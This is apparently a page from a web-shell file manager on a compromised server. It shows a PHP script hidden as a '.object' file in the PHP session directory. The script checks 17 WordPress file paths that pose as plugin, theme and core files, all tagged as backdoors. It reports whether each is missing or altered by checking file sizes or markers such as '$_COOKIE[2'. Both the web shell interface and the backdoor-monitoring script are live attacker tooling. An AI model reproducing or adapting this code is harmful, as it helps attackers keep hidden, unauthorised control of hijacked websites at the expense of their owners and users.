D7net
Home
Console
Upload
information
Create File
Create Folder
About
Tools
:
/
opt
/
cloudlinux
/
alt-php82
/
root
/
var
/
lib
/
php
/
session
/
Filename :
.object
back
Copy
<?php $r = '/home/vblioqus/public_html'; $x = ["/wp-content/plugins/wordpress-seo/src/dashboard/domain/score-groups/seo-score-groups/ok.seo.score.group.php"=>"bd@@98845@@1800", "/wp-admin/edit-form-advanced.php"=>"bd@@131375@@$_COOKIE[2", "/wp-includes/style-engine/class-wp-style-engine-css-rule.php"=>"bd@@131376@@$_COOKIE[2", "/wp-content/plugins/contact-1770843238/index.php"=>"bd@@131378@@45", "/wp-content/themes/twentytwentyfive/patterns/testimonials-6-col.php"=>"bd@@131379@@84", "/wp-content/themes/twentytwentyfive/patterns/testimonials-large.php"=>"bd@@131380@@32", "/wp-content/plugins/elementor/vendor_prefixed/twig/twig/twig/src/Node/Expression/Test/default_graph.php"=>"bd@@131381@@1661", "/wp-content/plugins/elementor/vendor_prefixed/twig/twig/twig/src/Node/Expression/wprobot.php"=>"bd@@131382@@1622", "/wp-content/plugins/elementor/app/modules/import-export-customization/data/routes/traits/handles.quota.errors.php"=>"bd@@131383@@947", "/wp-content/plugins/wordpress-seo/vendor_prefixed/psr/log/Psr/Log/gallery_listings.php"=>"bd@@131384@@1030", "/wp-content/plugins/elementor/core/editor/loader/v1/templates/editor.body.v1.view.php"=>"bd@@131385@@2693", "/wp-content/plugins/widget-1767132461/comment-section-1767132461.php"=>"bd@@43675@@1029", "/wp-content/themes/twentytwentyfour/patterns/hidden-posts-heading.php"=>"bd@@100008@@splitter_tool", "/wp-includes/Text/Diff/Engine/xdiff.php"=>"bd@@100012@@config_manager", "/wp-content/plugins/wordpress-seo/admin/class-meta-columns.php"=>"bd@@100013@@system_core", "/wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/psr7/src/Exception/system.php"=>"bd@@100024@@1549", "/wp-content/plugins/webp-converter-for-media/templates/components/widgets/about.php"=>"bd@@95734@@initialized"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');